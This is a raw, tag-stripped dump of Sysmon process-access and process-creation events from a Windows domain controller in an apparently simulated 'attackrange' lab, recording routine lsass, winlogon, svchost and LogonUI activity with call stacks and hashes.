12:24:43.117{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440740Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.117{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440739Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.117{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440738Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.108{42DC5269-028B-6088-C428-00000000BA01}64162576C:\Windows\system32\LogonUI.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\logoncontroller.dll+2eef5|C:\Windows\System32\RPCRT4.dll+48674|C:\Windows\System32\RPCRT4.dll+31850|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440737Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.093{42DC5269-CE99-6086-1500-00000000BA01}12006856C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440736Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.093{42DC5269-CE99-6086-1500-00000000BA01}12001256C:\Windows\system32\svchost.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440735Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440734Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.085{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440733Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.078{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440732Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.078{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440731Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440730Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440729Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440728Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440727Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440726Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440725Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.077{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CEA9-6086-2B00-00000000BA01}2920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440724Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.076{42DC5269-028A-6088-C228-00000000BA01}43046484C:\Windows\system32\csrss.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000440723Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.076{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-CE96-6086-0B00-00000000BA01}628C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440722Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.076{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440721Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.076{42DC5269-028A-6088-C328-00000000BA01}62725480C:\Windows\system32\winlogon.exe{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000440720Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.076{42DC5269-028B-6088-C428-00000000BA01}6416C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa39c1855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{42DC5269-CE97-6086-E703-000000000000}0x3e73SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000440719Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.075{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440718Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.075{42DC5269-CE96-6086-0B00-00000000BA01}6283052C:\Windows\system32\lsass.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440717Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.073{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440716Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:43.073{42DC5269-CE98-6086-0C00-00000000BA01}8403448C:\Windows\system32\svchost.exe{42DC5269-028A-6088-C328-00000000BA01}6272C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000440715Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 